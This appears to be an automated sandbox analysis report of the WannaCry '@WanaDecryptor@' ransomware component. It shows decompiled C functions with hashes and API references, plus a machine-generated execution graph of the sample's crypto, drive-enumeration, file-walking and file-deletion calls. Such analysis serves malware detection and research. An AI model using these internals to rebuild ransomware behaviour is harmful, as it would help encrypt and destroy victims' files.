                                                      Function 00404170 Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 82%
                                                      			E00404170(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t12;
				intOrPtr* _t20;
				intOrPtr _t25;

				_push(0xffffffff);
				_push(E00413776);
				_t12 =  *[fs:0x0];
				_push(_t12);
				 *[fs:0x0] = _t25;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				_v4 = 0;
				_t20 = __ecx + 0x48;
				_v16 = _t20;
				 *_t20 = 0x415c00;
				_v4 = 3;
				L00412D52();
				 *_t20 = 0x415bec;
				_v4 = 1;
				L00412CC2();
				_v4 = 0;
				L00412CC2();
				_v4 = 0xffffffff;
				L00412D94();
				 *[fs:0x0] = _v12;
				return _t12;
			}










                                                      0x00404170
                                                      0x00404172
                                                      0x00404177
                                                      0x0040417d
                                                      0x0040417e
                                                      0x0040418c
                                                      0x00404190
                                                      0x00404196
                                                      0x0040419e
                                                      0x004041a1
                                                      0x004041a5
                                                      0x004041ad
                                                      0x004041b2
                                                      0x004041ba
                                                      0x004041c0
                                                      0x004041c5
                                                      0x004041cd
                                                      0x004041d2
                                                      0x004041d9
                                                      0x004041e1
                                                      0x004041ec
                                                      0x004041f6

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                      • #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                      • #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#2414#795
                                                      • String ID:
                                                      • API String ID: 932896513-0
                                                      • Opcode ID: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction ID: 4f5e1f32c4d0deb5ef0c4e05178b03e64e757a210687b4ed5005f9af419c08f7
                                                      • Opcode Fuzzy Hash: de7d764f310d2b07daedf415afe273c0a0adcf5a3115b404c86b6cccc177a748
                                                      • Instruction Fuzzy Hash: A3018F74108792CFC300DF19C14138AFFE4ABA4720F54491EE091833A2D7F85198CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00402E00(void* __ecx, void* _a4, intOrPtr* _a8, char _a12) {
				intOrPtr* _t18;
				intOrPtr* _t22;
				intOrPtr _t23;
				intOrPtr _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				void* _t40;

				_t1 =  &_a12; // 0x40276a
				_t35 = _a8;
				if(_t35 ==  *_t1) {
					_t16 =  &_a4; // 0x40276a
					_t18 =  *_t16;
					 *_t18 = _t35;
					return _t18;
				} else {
					do {
						_t37 = _t35;
						_t35 =  *_t35;
						 *((intOrPtr*)( *((intOrPtr*)(_t37 + 4)))) =  *_t37;
						 *((intOrPtr*)( *_t37 + 4)) =  *((intOrPtr*)(_t37 + 4));
						_t30 =  *((intOrPtr*)(_t37 + 0xc));
						if(_t30 != 0) {
							_t23 =  *((intOrPtr*)(_t30 - 1));
							if(_t23 == 0 || _t23 == 0xff) {
								_push(_t30 + 0xfffffffe);
								L00412C98();
								_t40 = _t40 + 4;
							} else {
								 *((char*)(_t30 - 1)) = _t23 - 1;
							}
						}
						_push(_t37);
						 *((intOrPtr*)(_t37 + 0xc)) = 0;
						 *((intOrPtr*)(_t37 + 0x10)) = 0;
						 *((intOrPtr*)(_t37 + 0x14)) = 0;
						L00412C98();
						_t40 = _t40 + 4;
						_a8 = _a8 - 1;
					} while (_t35 != _a12);
					_t22 = _a4;
					 *_t22 = _t35;
					return _t22;
				}
			}










                                                      0x00402e00
                                                      0x00402e06
                                                      0x00402e0e
                                                      0x00402e7a
                                                      0x00402e7a
                                                      0x00402e7e
                                                      0x00402e82
                                                      0x00402e10
                                                      0x00402e14
                                                      0x00402e14
                                                      0x00402e16
                                                      0x00402e1d
                                                      0x00402e24
                                                      0x00402e27
                                                      0x00402e2c
                                                      0x00402e2e
                                                      0x00402e33
                                                      0x00402e43
                                                      0x00402e44
                                                      0x00402e49
                                                      0x00402e39
                                                      0x00402e3b
                                                      0x00402e3b
                                                      0x00402e33
                                                      0x00402e4c
                                                      0x00402e4d
                                                      0x00402e50
                                                      0x00402e53
                                                      0x00402e56
                                                      0x00402e62
                                                      0x00402e68
                                                      0x00402e68
                                                      0x00402e6d
                                                      0x00402e73
                                                      0x00402e77
                                                      0x00402e77

                                                      APIs
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825
                                                      • String ID: j'@
                                                      • API String ID: 41483190-370697233
                                                      • Opcode ID: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                                      • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                                      • Opcode Fuzzy Hash: 4b7a11e06f7b77b6c3f3455a4fa83ed2b0c26ddd3550b5a3317a6a2ed897b25e
                                                      • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407650 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00407650(void* __ecx, intOrPtr _a4) {
				intOrPtr _t3;
				void* _t4;

				_t3 = _a4;
				if(_t3 != 0x3e9) {
					if(_t3 == 0x3ea) {
						_t3 =  *((intOrPtr*)(__ecx + 0x820));
						if(_t3 == 0) {
							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
						}
					}
					L00412CBC();
					return _t3;
				} else {
					_t4 = E004076A0(__ecx, 1);
					L00412CBC();
					return _t4;
				}
			}





                                                      0x00407650
                                                      0x0040765c
                                                      0x00407675
                                                      0x00407677
                                                      0x0040767f
                                                      0x00407688
                                                      0x0040768d
                                                      0x0040767f
                                                      0x00407692
                                                      0x00407698
                                                      0x0040765e
                                                      0x00407660
                                                      0x00407667
                                                      0x0040766d
                                                      0x0040766d

                                                      APIs
                                                      • #2379.MFC42 ref: 00407692
                                                        • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                                      • #2379.MFC42(00000001), ref: 00407667
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379$time
                                                      • String ID: Wana Decrypt0r 2.0
                                                      • API String ID: 2017816395-4201229886
                                                      • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                                      • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                                      • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1683
                                                      Total number of Limit Nodes:14
                                                      execution_graph 5545 408c40 5546 408d5c 5545->5546 5548 408c97 5545->5548 5547 408c9d _ftol _ftol 5547->5548 5548->5546 5548->5547 6008 401140 #4710 SendMessageA SendMessageA #537 6013 401970 #3092 #6199 #800 6008->6013 6010 401199 SetTimer 6011 4011c3 CreateThread 6010->6011 6012 4011dd 6010->6012 6011->6012 6014 4012d0 6011->6014 6013->6010 6017 4012e0 sprintf sprintf GetFileAttributesA 6014->6017 6018 4013b0 fopen 6017->6018 6019 401350 6017->6019 6021 4012d9 6018->6021 6022 4013ef fread fclose sprintf fopen 6018->6022 6039 404640 InitializeCriticalSection 6019->6039 6022->6021 6024 401471 fread fclose sprintf fopen 6022->6024 6023 401359 6040 4047c0 6023->6040 6024->6021 6025 4014f2 fread fclose 6024->6025 6057 40be90 strncpy strncpy strncpy 6025->6057 6028 401377 6030 401395 DeleteFileA 6028->6030 6031 40137b 6028->6031 6029 401525 6058 40c240 6029->6058 6056 404690 DeleteCriticalSection 6030->6056 6101 404690 DeleteCriticalSection 6031->6101 6035 401575 6035->6021 6100 404640 InitializeCriticalSection 6035->6100 6037 40158c 6038 4047c0 16 API calls 6037->6038 6038->6031 6039->6023 6041 4046b0 CryptAcquireContextA 6040->6041 6043 40484e 6041->6043 6042 4048f3 6042->6028 6043->6042 6044 4049b0 7 API calls 6043->6044 6045 40486e 6044->6045 6046 4048e5 _local_unwind2 6045->6046 6048 4049b0 7 API calls 6045->6048 6046->6042 6049 40488a 6048->6049 6049->6046 6050 404895 CryptEncrypt 6049->6050 6050->6046 6051 404908 CryptDecrypt 6050->6051 6051->6046 6052 404932 strncmp 6051->6052 6053 404984 6052->6053 6054 40495e _local_unwind2 6052->6054 6102 4049a6 6053->6102 6054->6028 6056->6018 6057->6029 6059 40c25f 6058->6059 6060 40bed0 110 API calls 6059->6060 6061 40c29b 6060->6061 6062 40c2a2 6061->6062 6063 40c2c8 6061->6063 6064 40c2bc 6062->6064 6065 40c2ad SendMessageA 6062->6065 6066 40c2e5 6063->6066 6067 40c2d9 SendMessageA 6063->6067 6069 40dbf0 free 6064->6069 6065->6064 6068 40dc00 4 API calls 6066->6068 6067->6066 6070 40c2f8 6068->6070 6095 40c3d8 6069->6095 6071 40dc00 4 API calls 6070->6071 6072 40c313 6071->6072 6073 40dd00 4 API calls 6072->6073 6074 40c324 6073->6074 6075 40dd00 4 API calls 6074->6075 6076 40c335 6075->6076 6077 40dc00 4 API calls 6076->6077 6078 40c350 6077->6078 6079 40dc00 4 API calls 6078->6079 6080 40c36b 6079->6080 6081 40dc00 4 API calls 6080->6081 6082 40c37d 6081->6082 6083 40c3e0 6082->6083 6084 40c3a9 6082->6084 6085 40c3f0 6083->6085 6086 40c3e4 SendMessageA 6083->6086 6087 40c3b9 6084->6087 6088 40c3ad SendMessageA 6084->6088 6089 40c419 6085->6089 6090 40c44d 6085->6090 6086->6085 6091 40dbf0 free 6087->6091 6088->6087 6092 40c429 6089->6092 6093 40c41d SendMessageA 6089->6093 6094 40c49c 6090->6094 6097 40c45e fopen 6090->6097 6091->6095 6099 40dbf0 free 6092->6099 6093->6092 6094->6064 6096 40c4a0 SendMessageA 6094->6096 6095->6035 6096->6064 6097->6094 6098 40c479 fwrite fclose 6097->6098 6098->6094 6099->6095 6100->6037 6101->6021 6103 404770 3 API calls 6102->6103 6104 4049ad 6103->6104 6104->6042 6228 409a40 6232 409d40 6228->6232 6231 409ae7 #2414 #2414 6233 409a87 OffsetRect CreateRectRgn #1641 #5781 6232->6233 6233->6231 6471 409f40 PtVisible 6472 40cf40 6480 40d300 6472->6480 6474 40cf61 6475 40d300 6 API calls 6474->6475 6476 40cf66 6474->6476 6477 40cf87 6475->6477 6478 40d300 6 API calls 6477->6478 6479 40cf8c 6477->6479 6478->6479 6481 40d31f 6480->6481 6482 40d32e 6480->6482 6481->6474 6483 40d339 6482->6483 6484 40d373 time 6482->6484 6486 40d363 6482->6486 6487 40d378 6482->6487 6483->6474 6488 40d493 6484->6488 6489 40d41e 6484->6489 6502 40d2b0 6486->6502 6491 40d3b0 6487->6491 6492 40d380 6487->6492 6493 40d4b1 6488->6493 6498 40d4a8 free 6488->6498 6489->6488 6500 40d487 time 6489->6500 6501 40d469 Sleep 6489->6501 6506 412a90 malloc 6491->6506 6494 40d2b0 memmove 6492->6494 6493->6474 6494->6484 6496 40d3b6 6497 40d3c1 6496->6497 6499 40d2b0 memmove 6496->6499 6497->6474 6498->6493 6499->6484 6500->6488 6500->6489 6501->6489 6503 40d2f5 6502->6503 6504 40d2be 6502->6504 6503->6484 6505 40d2c3 memmove 6504->6505 6505->6503 6505->6505 6506->6496 5549 404050 #616 5550 404068 5549->5550 5551 40405f #825 5549->5551 5551->5550 6105 404150 6110 404170 #2414 #800 #800 #795 6105->6110 6107 404158 6108 404168 6107->6108 6109 40415f #825 6107->6109 6109->6108 6110->6107 6234 403250 6235 403261 #825 6234->6235 6236 40326a 6234->6236 6235->6236 6237 407650 6238 40765e 6237->6238 6241 407670 6237->6241 6239 4076a0 20 API calls 6238->6239 6242 407665 #2379 6239->6242 6240 407690 #2379 6241->6240 6243 40b620 9 API calls 6241->6243 6244 40768d 6243->6244 6244->6240 6245 413254 _exit 6111 413556 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 5417 405a60 5464 40b620 FindWindowW 5417->5464 5421 405aab #2514 5487 403f20 #2414 5421->5487 5423 405ae9 5488 403f20 #2414 5423->5488 5425 405b04 5489 403f20 #2414 5425->5489 5427 405b1f 5490 403f20 #2414 5427->5490 5429 405b3f 5491 403f20 #2414 5429->5491 5431 405b5a 5492 403f20 #2414 5431->5492 5433 405b75 5493 403f20 #2414 5433->5493 5435 405b90 5494 403f20 #2414 5435->5494 5437 405bab 5495 403f20 #2414 5437->5495 5439 405bc6 5496 403f20 #2414 5439->5496 5441 405be1 5497 403f20 #2414 5441->5497 5443 405bfc 5498 403f90 #2414 5443->5498 5445 405c10 5499 403f90 #2414 5445->5499 5447 405c24 #800 #800 #800 #800 #781 5500 4050a0 #800 #795 5447->5500 5449 405c9c 5501 4050a0 #800 #795 5449->5501 5451 405cb0 5502 404170 #2414 #800 #800 #795 5451->5502 5453 405cc4 5503 404170 #2414 #800 #800 #795 5453->5503 5455 405cd8 5504 404170 #2414 #800 #800 #795 5455->5504 5457 405cec 5505 404170 #2414 #800 #800 #795 5457->5505 5459 405d00 5506 405d90 #654 #765 5459->5506 5461 405d14 5507 405d90 #654 #765 5461->5507 5463 405d28 #609 #609 #616 #641 5465 40b634 7 API calls 5464->5465 5466 405a8a #1134 #2621 #6438 5464->5466 5465->5466 5467 40b687 ExitProcess 5465->5467 5468 4060e0 #324 #567 #567 #567 5466->5468 5508 4085c0 7 API calls 5468->5508 5470 406162 5471 4085c0 9 API calls 5470->5471 5472 406172 5471->5472 5512 404090 7 API calls 5472->5512 5474 406182 5513 404090 7 API calls 5474->5513 5476 406192 5514 404090 7 API calls 5476->5514 5478 4061a2 5515 404090 7 API calls 5478->5515 5480 4061b2 5516 405000 #567 #540 5480->5516 5482 4061c2 5483 405000 2 API calls 5482->5483 5484 4061d2 #567 #540 #540 #540 #540 5483->5484 5518 407640 5484->5518 5486 4062cb 7 API calls 5486->5421 5487->5423 5488->5425 5489->5427 5490->5429 5491->5431 5492->5433 5493->5435 5494->5437 5495->5439 5496->5441 5497->5443 5498->5445 5499->5447 5500->5449 5501->5451 5502->5453 5503->5455 5504->5457 5505->5459 5506->5461 5507->5463 5509 408660 #6140 5508->5509 5510 408654 5508->5510 5509->5470 5510->5509 5511 40865a GetSysColor 5510->5511 5511->5509 5512->5474 5513->5476 5514->5478 5515->5480 5517 40504a 5516->5517 5517->5482 5518->5486 5552 403860 SendMessageA 5553 403892 SendMessageA 5552->5553 5554 403883 #1200 5552->5554 5555 4038d1 5553->5555 5556 4038a5 SendMessageA CreateThread 5553->5556 5556->5555 5557 4038e0 5556->5557 5560 4038f0 5557->5560 5559 4038e9 5579 403eb0 6 API calls 5560->5579 5562 403916 SendMessageA 5563 4039e1 5562->5563 5564 403937 SendMessageA 5562->5564 5626 403eb0 6 API calls 5563->5626 5565 403951 5564->5565 5566 403958 5564->5566 5580 403af0 fopen 5565->5580 5597 401e90 5566->5597 5569 4039ea CloseHandle 5569->5559 5571 403961 sprintf 5602 402020 5571->5602 5573 403998 5574 40399c 5573->5574 5611 403a20 5573->5611 5575 4039cd 5574->5575 5578 4039c8 #1200 5574->5578 5619 401f30 5575->5619 5578->5575 5579->5562 5581 403b41 5580->5581 5582 403b28 5580->5582 5583 401e90 InitializeCriticalSection 5581->5583 5582->5566 5584 403b4d 5583->5584 5585 402020 14 API calls 5584->5585 5586 403b67 5585->5586 5587 403b6b 5586->5587 5595 403b9b 5586->5595 5588 401f30 6 API calls 5587->5588 5590 403b82 5588->5590 5589 403c61 fclose 5591 401f30 6 API calls 5589->5591 5590->5566 5593 403c8f 5591->5593 5592 403bb2 fgets 5594 403c5f 5592->5594 5592->5595 5593->5566 5594->5589 5595->5589 5595->5592 5595->5594 5627 402650 MultiByteToWideChar 5595->5627 5719 404640 InitializeCriticalSection 5597->5719 5599 401eb6 5720 404640 InitializeCriticalSection 5599->5720 5601 401ec4 5601->5571 5721 4046f0 5602->5721 5604 402031 5605 402035 5604->5605 5606 402048 GlobalAlloc 5604->5606 5607 4046f0 12 API calls 5604->5607 5605->5573 5608 402061 5606->5608 5609 402066 GlobalAlloc 5606->5609 5607->5606 5608->5573 5610 402079 5609->5610 5610->5573 5612 403a32 GetLogicalDrives 5611->5612 5613 403adc 5611->5613 5617 403a48 5612->5617 5613->5574 5614 403a53 GetDriveTypeW 5615 403a81 GetDiskFreeSpaceExW 5614->5615 5614->5617 5615->5617 5616 403ace 5616->5574 5617->5614 5617->5616 5759 4026b0 5617->5759 5849 401fa0 5619->5849 5621 401f60 5858 404690 DeleteCriticalSection 5621->5858 5623 401f7a 5859 404690 DeleteCriticalSection 5623->5859 5625 401f8a 5625->5563 5626->5569 5630 402560 wcscpy wcsrchr 5627->5630 5629 40269a 5629->5595 5631 4025c9 wcscat 5630->5631 5632 402599 _wcsicmp 5630->5632 5633 4025bd 5631->5633 5632->5633 5634 4025ae _wcsicmp 5632->5634 5643 4020a0 CreateFileW 5633->5643 5634->5631 5634->5633 5636 4025eb 5637 402629 DeleteFileW 5636->5637 5638 4025ef DeleteFileW 5636->5638 5639 402634 5637->5639 5638->5639 5640 4025fa 5638->5640 5639->5629 5641 402617 5640->5641 5642 4025fe MoveFileW 5640->5642 5641->5629 5642->5629 5644 402143 GetFileTime ReadFile 5643->5644 5662 402139 _local_unwind2 5643->5662 5646 40217c 5644->5646 5644->5662 5647 402196 ReadFile 5646->5647 5646->5662 5648 4021b3 5647->5648 5647->5662 5649 4021c3 ReadFile 5648->5649 5648->5662 5650 4021ea ReadFile 5649->5650 5649->5662 5651 402208 ReadFile 5650->5651 5650->5662 5652 402226 5651->5652 5651->5662 5653 402233 CloseHandle CreateFileW 5652->5653 5654 4022f9 CreateFileW 5652->5654 5656 402264 SetFilePointer ReadFile 5653->5656 5653->5662 5655 40232c 5654->5655 5654->5662 5676 404af0 5655->5676 5658 402297 5656->5658 5656->5662 5660 4022a4 SetFilePointer WriteFile 5658->5660 5658->5662 5659 40234d 5661 402372 5659->5661 5665 404af0 4 API calls 5659->5665 5660->5662 5663 4022ce 5660->5663 5661->5662 5681 40a150 5661->5681 5662->5636 5663->5662 5664 4022db SetFilePointer SetEndOfFile 5663->5664 5667 402497 SetFileTime 5664->5667 5665->5661 5668 4024e0 _local_unwind2 5667->5668 5669 4024bc CloseHandle MoveFileW 5667->5669 5668->5636 5669->5668 5671 402477 SetFilePointerEx SetEndOfFile 5671->5667 5672 4023e0 ReadFile 5672->5662 5673 4023a7 5672->5673 5673->5662 5673->5671 5673->5672 5688 40b3c0 5673->5688 5677 404b04 EnterCriticalSection CryptDecrypt 5676->5677 5678 404afc 5676->5678 5679 404b3b LeaveCriticalSection 5677->5679 5680 404b2d LeaveCriticalSection 5677->5680 5678->5659 5679->5659 5680->5659 5682 40a184 5681->5682 5683 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 5681->5683 5684 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 5682->5684 5685 40a1bd 5682->5685 5683->5682 5684->5685 5686 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 5685->5686 5687 40a1f6 5685->5687 5686->5687 5687->5673 5689 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 5688->5689 5690 40b3ee 5688->5690 5689->5690 5691 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 5690->5691 5699 40b410 5690->5699 5692 40b5ba 5694 40b0c0 4 API calls 5692->5694 5700 402424 WriteFile 5692->5700 5694->5692 5696 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 5698 40b4ed 5696->5698 5697 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 5697->5692 5698->5692 5698->5697 5698->5700 5707 40adc0 5698->5707 5699->5696 5699->5698 5699->5699 5699->5700 5701 40b0c0 5699->5701 5700->5662 5700->5673 5702 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 5701->5702 5703 40b0ee 5701->5703 5702->5703 5706 40b114 5703->5706 5713 40a9d0 5703->5713 5706->5699 5708 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 5707->5708 5709 40adee 5707->5709 5708->5709 5710 40ae14 5709->5710 5716 40a610 5709->5716 5710->5698 5714 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 5713->5714 5715 40a9ff 5713->5715 5714->5715 5715->5699 5717 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 5716->5717 5718 40a63f 5716->5718 5717->5718 5718->5698 5719->5599 5720->5601 5738 4046b0 5721->5738 5723 4046f8 5724 404709 5723->5724 5725 4046fc 5723->5725 5727 404711 CryptImportKey 5724->5727 5728 40473e 5724->5728 5743 404770 5725->5743 5731 404760 5727->5731 5732 404731 5727->5732 5750 4049b0 CreateFileA 5728->5750 5731->5604 5733 404770 3 API calls 5732->5733 5735 404738 5733->5735 5734 40474c 5734->5731 5736 404770 3 API calls 5734->5736 5735->5604 5737 40475a 5736->5737 5737->5604 5739 4046b7 CryptAcquireContextA 5738->5739 5740 4046e0 5739->5740 5741 4046d7 5739->5741 5740->5723 5741->5739 5742 4046dd 5741->5742 5742->5723 5744 404788 5743->5744 5745 40477a CryptDestroyKey 5743->5745 5746 40479d 5744->5746 5747 40478f CryptDestroyKey 5744->5747 5745->5744 5748 404703 5746->5748 5749 4047a4 CryptReleaseContext 5746->5749 5747->5746 5748->5604 5749->5748 5751 404a1b _local_unwind2 5750->5751 5752 404a09 GetFileSize 5750->5752 5751->5734 5752->5751 5753 404a25 5752->5753 5753->5751 5755 404a38 GlobalAlloc 5753->5755 5755->5751 5756 404a49 ReadFile 5755->5756 5756->5751 5757 404a64 CryptImportKey 5756->5757 5757->5751 5758 404a81 _local_unwind2 5757->5758 5758->5734 5760 40c8f0 #823 5759->5760 5761 4026e4 5760->5761 5762 40c8f0 #823 5761->5762 5763 402706 swprintf FindFirstFileW 5762->5763 5764 40274d 5763->5764 5778 4027b4 5763->5778 5798 402e00 5764->5798 5766 40276a #825 5768 402e00 2 API calls 5766->5768 5767 4027d4 wcscmp 5770 40295d FindNextFileW 5767->5770 5771 4027ee wcscmp 5767->5771 5772 4027a0 #825 5768->5772 5769 402978 FindClose 5776 40298d 5769->5776 5780 4029b9 5769->5780 5770->5769 5770->5778 5771->5770 5773 402808 swprintf GetFileAttributesW 5771->5773 5775 402ace 5772->5775 5777 4028b6 wcscmp 5773->5777 5773->5778 5774 4029ef swprintf DeleteFileW swprintf DeleteFileW 5781 402a6a #825 5774->5781 5782 402a4f 5774->5782 5775->5617 5776->5780 5788 402560 59 API calls 5776->5788 5777->5770 5779 4028d0 wcscmp 5777->5779 5778->5767 5778->5769 5778->5770 5791 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5778->5791 5804 402af0 _wcsnicmp 5778->5804 5779->5770 5784 4028e6 wcscmp 5779->5784 5780->5774 5790 4026b0 84 API calls 5780->5790 5786 402a94 5781->5786 5787 402aba #825 5781->5787 5793 402a66 5782->5793 5830 402e90 5782->5830 5784->5770 5789 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 5784->5789 5786->5787 5795 402e90 2 API calls 5786->5795 5787->5775 5788->5776 5792 402da0 8 API calls 5789->5792 5790->5780 5826 402da0 #823 5791->5826 5796 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5792->5796 5793->5781 5795->5786 5796->5770 5799 402e7a 5798->5799 5803 402e10 5798->5803 5799->5766 5800 402e4c #825 5801 402e6d 5800->5801 5800->5803 5801->5766 5802 402e40 #825 5802->5800 5803->5800 5803->5802 5805 402b12 wcsstr 5804->5805 5806 402b1f 5804->5806 5805->5806 5807 402b30 _wcsicmp 5806->5807 5808 402be9 _wcsicmp 5806->5808 5811 402b42 5807->5811 5812 402b4d _wcsicmp 5807->5812 5809 402c07 _wcsicmp 5808->5809 5810 402bfc 5808->5810 5813 402c21 _wcsicmp 5809->5813 5814 402c16 5809->5814 5810->5778 5811->5778 5815 402b67 _wcsicmp 5812->5815 5816 402b5c 5812->5816 5813->5778 5814->5778 5817 402b81 _wcsicmp 5815->5817 5818 402b76 5815->5818 5816->5778 5819 402b90 5817->5819 5820 402b9b _wcsicmp 5817->5820 5818->5778 5819->5778 5821 402bb5 wcsstr 5820->5821 5822 402baa 5820->5822 5823 402bc4 5821->5823 5824 402bcf wcsstr 5821->5824 5822->5778 5823->5778 5824->5808 5825 402bde 5824->5825 5825->5778 5827 402dbf 5826->5827 5835 402f10 5827->5835 5829 402de4 5829->5796 5831 402ed0 #825 5830->5831 5832 402eb1 5830->5832 5831->5782 5833 402ec4 #825 5832->5833 5834 402ebd 5832->5834 5833->5831 5834->5831 5836 402f40 5835->5836 5843 403044 5835->5843 5837 402f68 5836->5837 5842 402fdb 5836->5842 5839 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5837->5839 5840 402f6e ?_Xran@std@ 5837->5840 5838 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5838->5843 5844 402f85 5839->5844 5840->5839 5841 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5841->5829 5842->5838 5845 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5842->5845 5843->5829 5844->5841 5846 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5844->5846 5847 403006 5845->5847 5846->5841 5848 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5846->5848 5847->5829 5848->5841 5850 404770 3 API calls 5849->5850 5851 401fac 5850->5851 5852 404770 3 API calls 5851->5852 5853 401fb4 5852->5853 5853->5853 5855 401fe3 5853->5855 5856 401fd0 GlobalFree 5853->5856 5854 40200c 5854->5621 5855->5854 5857 401ff9 GlobalFree 5855->5857 5856->5855 5857->5854 